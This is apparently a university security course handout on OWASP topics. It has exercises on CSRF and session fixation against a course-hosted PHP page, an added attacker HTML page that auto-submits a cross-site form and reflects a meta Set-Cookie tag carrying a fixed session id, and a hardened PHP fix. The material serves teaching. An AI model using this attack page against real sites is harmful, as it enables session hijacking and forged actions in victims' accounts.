OWASP Review
Partner with a CSC309 student for best effect on this tutorial!
Go to
https://cs.utm.utoronto.ca/~rosenbl6/427/xsrf/secrets.php
This is the code from the midterm.
1) Demonstrate: XSRF (CSRF)
a) Attacker creates the file https://cs.utm.utoronto.ca/~ATTACKER_UTORID/xsrf.html
b) Target shuts down and restarts Firefox (so they start with a fresh session)
c) Target visits https://cs.utm.utoronto.ca/~rosenbl6/427/xsrf/secrets.php and
adds a few secrets to their session
d) Target visits https://cs.utm.utoronto.ca/~ATTACKER_UTORID/xsrf.html
e) Target now visits https://cs.utm.utoronto.ca/~rosenbl6/427/xsrf/secrets.php and
sees the attacker's secrets in their session
2) Demonstrate: Session Fixation using a meta tag
a) Attacker creates the file https://cs.utm.utoronto.ca/~ATTACKER_UTORID/session_fixate.html
b) Attacker visits https://cs.utm.utoronto.ca/~rosenbl6/427/xsrf/secrets.php
c) Attacker pulls their PHPSESSID from Firefox (look at the cookies in Firefox under Preferences/Privacy)
d) Attacker's session_fixate.html uses CSRF as in 1), but this time the value it
sends causes a meta tag to be reflected back to the Target. The meta tag sets the
Target's PHPSESSID to the Attacker's PHPSESSID
e) Target and Attacker now both share the Attacker's session
HINT: I already have a session started with PHPSESSID=rfup8grbgusau501lua5c6aa21
see if you can create a URL which will cause your own browser to
join that session...
https://cs.utm.utoronto.ca/~rosenbl6/427/xsrf/secrets.php?
HINT: You might want to look at http://meyerweb.com/eric/tools/dencoder/
HINT: http://www.metatags.info/meta_http_equiv_set_cookie
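The page below is an added example of the attacker file for exercises 1) and 2) (one file serves as xsrf.html or session_fixate.html depending on a single switch); it is not part of the course starter zip. It assumes secrets.php reads the new secret from a GET parameter called secret, as the "secrets.php?" hint suggests; the real parameter name and method are in the starter code, so check its form first. Two things worth knowing before you test it: the browser URL-encodes the form value for you, so the dencoder tool is only needed when you type the fixation URL by hand, and <meta http-equiv="Set-Cookie"> was removed from Chrome 65 and Firefox 68, so on a current browser the reflected tag is rendered but no longer changes the cookie, and exercise 2) only works as described on older browsers.

```html
<!DOCTYPE html>
<!--
  Added example for exercises 1) and 2); not the course's starter code.
  Hosted at https://cs.utm.utoronto.ca/~ATTACKER_UTORID/xsrf.html
  Assumption: secrets.php takes the new secret in a GET parameter named "secret".
  If the starter code's form uses POST, change method="get" to method="post".
-->
<html>
<head><meta charset="utf-8"><title>Nothing to see here</title></head>
<body>
<p>Loading...</p>

<!-- The form is submitted cross-site to the victim application. The browser
     attaches the Target's own PHPSESSID cookie to that request, which is
     exactly what makes this a CSRF: the server cannot tell it apart from
     a request the Target typed in themselves. -->
<form id="csrf" method="get"
      action="https://cs.utm.utoronto.ca/~rosenbl6/427/xsrf/secrets.php">
  <input type="hidden" id="secret" name="secret" value="">
</form>

<script>
  // false: exercise 1, plant an attacker-chosen secret in the Target's session.
  // true:  exercise 2, make secrets.php reflect a <meta> tag that overwrites the
  //        Target's PHPSESSID with the Attacker's, so both share one session
  //        from the next request onwards.
  var SESSION_FIXATION = false;

  // The Attacker's own session id, read from Firefox's cookie viewer
  // (this is the value from the handout's hint).
  var ATTACKER_SID = 'rfup8grbgusau501lua5c6aa21';

  var payload = SESSION_FIXATION
    ? '<meta http-equiv="Set-Cookie" content="PHPSESSID=' + ATTACKER_SID + '">'
    : 'ATTACKER_UTORID was here';

  // Form submission URL-encodes the value, so no manual encoding is needed.
  document.getElementById('secret').value = payload;
  document.getElementById('csrf').submit();
</script>
</body>
</html>
```

To obtain the URL the hint asks for, load this page once with SESSION_FIXATION set to true and copy the address bar after the redirect: it is the same percent-encoded query string the dencoder would produce.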
3) Explain how XSS can occur given that the script is vulnerable to CSRF
4) Explain how XSS can occur given that the script is vulnerable to Session Fixation
5) Lock down the application by
a) whitelisting input: allow [a-zA-Z0-9 ] as well as <, =, > in the input
(so what if I really did want these characters!)
b) using htmlentities on output
c) including a random token in the form and checking it on every request that changes state
d) authenticating 'sue' with password 'supersecure' and 'arnold' with password 'spiderman'
as users of the application. Start a new session once the user is authenticated.
For this exercise, it is OK to hardcode the two users and their passwords in the
script. Note: this does not prevent an attacker from fixating using their own account,
similarly to what was done to exploit the original secrets.php, but if the account
is identified and used as part of the application, fixation amounts to traceable updates
to the attacker's account instead of the target's account.
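The script below is an added example of a secrets.php hardened along the lines of 5a) to 5d); it is not the starter code from xsrf.zip and not the patched file you hand in. It assumes the application keeps its list in $_SESSION['secrets'] and names the input field secret (both are assumptions; the starter code's names may differ) and targets PHP 7.3 or later. It also goes a little beyond the list: secrets are added with POST instead of GET, and the session cookie is marked HttpOnly with strict mode enabled. Strict mode only rejects ids the server never issued, so it does not stop the handout's attack (the attacker's id is a real one); what defeats that is session_regenerate_id() at login, which is step 5d).

```php
<?php
// Hardened secrets.php (added example; not the course starter code).
// Assumptions: secrets live in $_SESSION['secrets'], the input field is "secret".
declare(strict_types=1);

ini_set('session.use_only_cookies', '1'); // never accept PHPSESSID from the URL
ini_set('session.use_strict_mode', '1');  // reject ids the server never issued
session_set_cookie_params(['httponly' => true, 'secure' => true, 'samesite' => 'Lax']);
session_start();

// 5d) hardcoded users, as the handout permits for this exercise.
const USERS = ['sue' => 'supersecure', 'arnold' => 'spiderman'];

function check_login(string $user, string $pass): bool {
    // hash_equals compares in constant time, so the password length does not leak.
    return isset(USERS[$user]) && hash_equals(USERS[$user], $pass);
}

// 5a) whitelist: letters, digits, space, plus < = > (harmless once output is encoded).
function valid_secret(string $s): bool {
    return preg_match('/\A[a-zA-Z0-9 <=>]+\z/', $s) === 1;
}

// 5b) encode on output; never trust a stored string, even one that passed 5a).
function h(string $s): string {
    return htmlentities($s, ENT_QUOTES | ENT_HTML5, 'UTF-8');
}

// 5c) one random token per session, required on every state-changing request.
function csrf_token(): string {
    if (empty($_SESSION['csrf'])) {
        $_SESSION['csrf'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf'];
}
function csrf_ok(): bool {
    return isset($_POST['csrf']) && hash_equals(csrf_token(), (string) $_POST['csrf']);
}

// ---- login -------------------------------------------------------------------
if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['user'], $_POST['pass'])) {
    if (check_login((string) $_POST['user'], (string) $_POST['pass'])) {
        // 5d) fresh id on login: whatever id was fixated before is discarded.
        session_regenerate_id(true);
        $_SESSION = ['user' => (string) $_POST['user'], 'secrets' => []];
    }
    header('Location: ' . $_SERVER['SCRIPT_NAME']); // redirect so a refresh cannot replay
    exit;
}

if (empty($_SESSION['user'])) {
    echo '<form method="post">User <input name="user"> '
       . 'Password <input type="password" name="pass"> <button>Login</button></form>';
    exit;
}

// ---- add a secret ------------------------------------------------------------
if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['secret'])) {
    if (!csrf_ok()) {
        http_response_code(403);
        exit('Missing or invalid token'); // the cross-site page from 1) cannot know it
    }
    $secret = (string) $_POST['secret'];
    if (valid_secret($secret)) {
        $_SESSION['secrets'][] = $secret;
    }
    header('Location: ' . $_SERVER['SCRIPT_NAME']);
    exit;
}

// ---- output ------------------------------------------------------------------
echo '<h1>Secrets of ' . h($_SESSION['user']) . '</h1><ul>';
foreach ($_SESSION['secrets'] as $s) {
    echo '<li>' . h($s) . '</li>'; // a stored <meta ...> is shown as text, not parsed
}
echo '</ul><form method="post">'
   . '<input type="hidden" name="csrf" value="' . h(csrf_token()) . '">'
   . '<input name="secret"> <button>Add secret</button></form>';
```

With this in place, rerun 1) and 2): the cross-site form is rejected with a 403 because it carries no token, and a PHPSESSID planted before login stops mattering because login issues a new id.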
Starter code can be found at
https://cs.utm.utoronto.ca/~rosenbl6/427/xsrf.zip (5c has been done for you already)
Hand in via submit (by Wednesday) a zip file owasp.zip consisting of
0) members.txt: the members of your group
1) xsrf.html
2) session_fixate.html
3) q3.txt: your explanation
4) q4.txt: your explanation
5) secrets.php: patched code